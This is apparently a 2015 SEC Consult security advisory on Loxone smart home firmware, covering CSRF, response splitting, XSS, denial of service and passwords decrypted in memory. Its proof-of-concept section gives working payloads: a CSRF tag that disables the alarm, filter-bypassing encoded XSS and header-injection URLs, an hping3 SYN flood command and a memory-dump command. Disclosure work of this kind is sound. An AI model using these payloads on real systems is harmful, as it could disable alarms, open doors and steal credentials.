### Vendor & product description:"Loxone Electronics was founded in 2009. Our focus is the development andproduction of control solutions for all homes. Our aim is to make homeautomation interesting, affordable and accessible for everyone."URL: http://www.loxone.com/enus/company/about-us.html### Business recommendation:Most of the issues previously identified (see SEC Consult security advisorySA-20150227-0) seem not to have been fixed properly and are still exploitableeither directly or by easily bypassing implemented measures. A very shortcrash-test of only a few hours even resulted in new vulnerabilities.The Loxone smart home has multiple design and implementation flaws whichcombined could be used by an attacker to: 1) remotely cause a denial of service condition which renders the smart home unusable which would effectively disable any Loxone-controlled alarm system, 2) steal the user's credentials for the management interface and fully control the smart home, 3) execute JavaScript code in the user's browser for further attacks, 4) control arbitrary devices connected to the system, e.g. switch on/off lights, remotely open doors or garages, disable alarm system, etc., 5) gain access to admin passwords of Loxone partners (e.g. electricians who are implementing the smart home solution at customers) and completely take over other smart homes of the same Loxone partner!It is recommended by SEC Consult not to use this smart home system until athorough security analysis (white box) of all components has been performed bysecurity professionals, as a very short crash test (Blackbox) already resultedin critical vulnerabilities.### Vulnerability overview/description:#### 1) Cross-site request-forgery (XSRF)The system is vulnerable to XSRF attacks. If an attacker is able to lure a userinto clicking a crafted link or by embedding such a link within web pages (e.g.discussion forums) he could control arbitrary functions within the smart homesystem.All functions can be controlled via web based commands, e.g. in order to switchon lights, remotely open doors or garages, disable the alarm system, etc.This can still be exploited in the current Loxone version and it does not seemto be fixed properly.#### 2) HTTP Response Splitting / Header injectionThe web server of the Loxone smart home system is vulnerable to HTTP responsesplitting attacks. If an attacker is able to lure a user into clicking acrafted link (e.g. just by clicking a URL in a discussion forum orphishing email) he could arbitrarily manipulate the server's response (e.g.injection of JavaScript code).This can still be exploited in the current Loxone version and it does not seemto be fixed properly. The implemented measures/filters can be easily bypassedusing double-encoded payloads.This attack is not limited to the admin interface, it can be exploited in anypath of the webserver.SEC Consult has verified this attack in the most current versions of MozillaFirefox and Google Chrome web browsers.#### 3) Reflected cross-site scripting (XSS) vulnerabilityThe web interface of Loxone smart home is vulnerable to reflected cross-sitescripting attacks. If an attacker is able to lure a user intoclicking a crafted link (e.g. just by clicking a URL in a discussion forum orphishing email) he could execute arbitrary JavaScript code in the user'sbrowser. Thereby he could steal the user's credentials or control arbitrarydevices within the smart home system. To exploit this vulnerability it isn'tmandatory for the user to be authenticated. Unauthenticated XSS vulnerabilitiesexist as well (by exploiting the HTTP Response Splitting vulnerabilitydescribed in 2) as authenticated ones.SEC Consult has verified this attack in the most current versions of MozillaFirefox and Google Chrome web browsers.#### 4) Denial of serviceAn attacker could perform a denial of service attack with simple measures, suchas synflood attacks. During such an attack the system isn't accessible via thenetwork and can't be controlled anymore which also means that alarm systemswon't work!This can still be exploited in the current Loxone version and it does not seemto be fixed properly. The miniserver was not reachable during the attack andrebooted after a short while (a few seconds) when running the attack (dependingon the bandwidth).Furthermore, other new DoS attack vectors have been identified, which crash theweb interface and are not related to the bandwidth network attacks.#### 5) Decrypted Loxone config passwords in memoryThe "Loxone Config" programming software for the Loxone smart home allows savingthe whole configuration into a XML file for backup or for user support (e.g. viaticketing system or discussion forum). This XML config file contains usernamesand passwords of all configured users (admin or non-admin with different accesslevels).Loxone partners (e.g. electricians who are implementing the smart home atcustomers) may also send such config files to their customers or provide endusers admin level access with different admin user accounts. The password ofthe Loxone partner's admin account is usually not shared and should be kepta secret.The passwords are stored encrypted (not hashed!) within the config file and areimmediately decrypted in memory upon opening such a config file by the LoxoneConfig software. Access to the Loxone miniserver is not needed!An attacker exploiting this issue is able to gain access to the admin passwordof the Loxone partner! This is especially critical if the same password is beingused in different customer installations. Attackers (e.g. one customer of theLoxone partner) can then directly manipulate or control other Loxone smart homesof the same Loxone partner!### Proof of concept:#### 1) Cross site request forgery (XSRF)This can still be exploited in the current Loxone version and it does not seemto be fixed entirely. As an example, the alarm system of the Loxone "demo case"can be disabled via this XSRF payload in case the admin has previously beenauthenticated for the web services and is surfing with the same web browser:“` <html> <img src=http://$ip/dev/sps/io/Alarmanlage/off></img> </html>“`#### 2) HTTP Response Splitting / Header injectionThe following payload only works by accessing the web interface when a user is_not_ authenticated which will be most of the time in regular use cases. Thismakes successful exploitation more easy.The WWW-Authenticate header is not properly sanitized and uses the URI for the"Basic realm" input. Any payload within the URL will be added to the realm. Itis possible to inject new headers or manipulate the response body in order toinject arbitrary HTML/JavaScript code (Response splitting / Header injection).The following URL demonstrates this issue and injects some HTML/JavaScript code(combined XSS attack) that generates a popup as an example:“`http://$ip/%2522%250aContent-Type:%20text%252fhtml%250a%250a%253chtml%253e%253cscript%253ealert%28123%29%253c%252fscript%253e%253c%252fhtml%253e“`An attacker who is able to trick a user into clicking this link (e.g. phishingemail or discussion forum) will for example be able to re-create the login pageof the Loxone miniserver device and trick a user into sending username/passwordto an attacker-controlled server.#### 3) Reflected cross-site scripting (XSS) vulnerabilityTo reproduce this behavior it is sufficient to open the following URL as anauthenticated user (or social engineer the victim to enter the credentials whenprompted), which will show a popup message and turn on the LED light of theLoxone demo case. The payload uses double-encoded values in order to bypass thepreviously incorrectly implemented filters:“` http://$ip/dev/sps/io/%2522%253E%253Cscript%2520xmlns=%2527http:%25 26%2523x2f%253B%2526%2523x2f%253Bwww.w3.org/1999/xhtml%2527%253Ealert%2528%2527 you%2520got%2520p0wned%2520again%2527%2529%253b%2520r=new%2520XMLHttpRequest%2528%2529;%2520r.open%2528%2527GET%2527,%2527/dev/sps/io/MK_T5/on%2527,true%2529;%2520r.send%2528%2529;%253C/script%253E“`#### 4) Denial of serviceRunning the following command will keep the miniserver in a non-responsive stateafter a few seconds (depending on the bandwidth) and it will not recover untilthe attack is stopped (it will reboot afterwards). During this attack, nothingcan be controlled anymore (no switch of the demo case worked):“` hping3 -S –flood -p 80 $ip“`Furthermore, the following HTTP request (sometimes it is necessary to send it afew times) renders the web interface itself unusable. It is not possibleanymore to control the smart home as the web interface does not work properlyanymore, e.g. afterwards connection reset/unreachable errors or login errorsoccur although the password has been correctly entered in the web interface,etc.):“` GET /index.html HTTP/1.1 Host: foo Sec-WebSocket-Key1: foo“`A reboot is necessary in order to make the web interface work again.#### 5) Decrypted Loxone config passwords in memoryThis vulnerability can be easily verified when dumping the memory of theattacker's system which every local attacker has access to if he wants to gainaccess to passwords of his Loxone partner or other configuration filespublished by users on the Internet!It has been verified by installing Loxone Config in a virtual environment(VirtualBox) and using the following command to gain access to the memory:“` VBoxManage debugvm $vmname dumpguestcore –filename dump“`Upon opening the config file (e.g. of any Loxone partner or other end user whohas published his configuration at the discussion forum) the Loxone Configsoftware will immediately decrypt the passwords and keep them unencrypted inmemory. The encryption key is suspected to be the same for all Loxone Configinstallations, but this has not been verified (no reverse engineering ofLoxone Config has been performed). Access to the miniserver is not needed, itis simply enough to open the configuration file.The decrypted passwords of all users can be easily found in the dumped memorywhen searching for the username.### Vulnerable / tested versions:—————————–The vulnerabilities have been verified to exist in firmware version 6.3.3.11 ofthe Loxone smart home, which was the most recent version at the time of discovery.It is assumed that all previous firmware versions are affected as well.### Vendor contact timeline:* 2015-03-13: Contacting vendor through email, sending responsible disclosure policy, defining release deadline (4th May), asking for encryption keys* 2015-03-13: Vendor: no encryption available; sending advisory unencrypted* 2015-03-19: Answering question of Loxone regarding CSRF attacks* 2015-04-16: Asking for status update: Vendor asks to delay disclosure until 14th May* 2015-05-13: Updated firmware v6.4.5.12 available* 2015-05-14: SEC Consult releases security advisory### Solution:According to the vendor the firmware version v6.4.5.12 fixes the identifiedsecurity issues.It can be downloaded at the following URL and should be installed immediatelyin order to increase the level of security:http://www.loxone.com/tl_files/loxone/downloads/config/Loxone-Config-6.4.5.12.zip### Workaround:Only connect to your miniserver via secure VPN and disable any port forwardings.Use an isolated PC (browser) to control the smart home and do not surf on theweb while being logged in to the miniserver web interface.Use different passwords for all installations and don't reuse them.
